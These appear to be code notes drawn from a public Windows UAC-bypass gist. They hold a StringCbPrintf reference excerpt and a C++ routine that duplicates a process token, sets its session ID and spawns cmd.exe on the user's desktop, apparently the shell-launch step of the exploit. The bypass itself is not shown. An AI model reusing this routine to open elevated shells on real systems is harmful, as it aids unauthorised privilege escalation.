Credit : https://gist.githubusercontent.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82/raw/ebc085ad890231375164ca2e72ac1b186e409018/SCMUACBypass.cpp
StringCbPrintf is a replacement for the following functions:
STRSAFEAPI StringCbPrintfW(
[out] STRSAFE_LPWSTR pszDest,
[in] size_t cbDest,
[in] STRSAFE_LPCWSTR pszFormat,
...
);
StringCbPrintf(cmdline, sizeof(cmdline), L"\\"%ls\\" %d\\n", exe.c_str(), session_id);
Credit : https://gist.githubusercontent.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82/raw/ebc085ad890231375164ca2e72ac1b186e409018/SCMUACBypass.cpp
int RunSystemProcess(const wchar_t* sid)
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_DUPLICATE, &hToken))
{
printf("Error opening process token %d\\n", GetLastError());
return 1;
}
HANDLE hPrimaryToken;
if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, &hPrimaryToken))
{
printf("Error duplicating process token %d\\n", GetLastError());
return 1;
}
DWORD session_id = wcstoul(sid, nullptr, 0);
if (!SetTokenInformation(hPrimaryToken, TokenSessionId, &session_id, sizeof(session_id)))
{
printf("Error setting session ID %d\\n", GetLastError());
return 1;
}
STARTUPINFO start_info = {};
WCHAR desktop[] = L"WinSta0\\\\Default";
start_info.cb = sizeof(start_info);
start_info.lpDesktop = desktop;
start_info.wShowWindow = SW_SHOW;
WCHAR cmdline[] = L"cmd.exe";
PROCESS_INFORMATION proc_info = {};
if (!CreateProcessAsUser(hPrimaryToken, nullptr, cmdline, nullptr, nullptr, FALSE,
CREATE_NEW_CONSOLE, nullptr, nullptr, &start_info, &proc_info))
{
printf("Error creating process %d\\n", GetLastError());
return 1;
}
CloseHandle(proc_info.hProcess);
CloseHandle(proc_info.hThread);
printf("Created process ID %d\\n", proc_info.dwProcessId);
return 0;
}